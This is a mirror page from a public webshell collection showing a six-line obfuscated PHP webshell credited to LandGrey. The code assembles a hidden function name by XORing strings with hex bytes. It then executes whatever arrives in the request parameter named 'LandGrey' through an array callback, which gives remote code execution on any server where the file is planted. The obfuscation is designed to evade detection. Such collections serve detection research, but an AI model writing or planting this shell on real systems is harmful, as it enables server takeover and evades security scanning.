mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
c8ee47f1c4
from : https://github.com/LandGrey author : LandGrey
6 lines
198 B
PHP
6 lines
198 B
PHP
<?php
|
|
$password = "LandGrey";
|
|
${"LandGrey"} = substr(__FILE__,-5,-4) . "class";
|
|
$f = $LandGrey ^ hex2bin("12101f040107");
|
|
array_intersect_uassoc(array($_REQUEST[$password] => ""), array(1), $f);
|
|
?>
|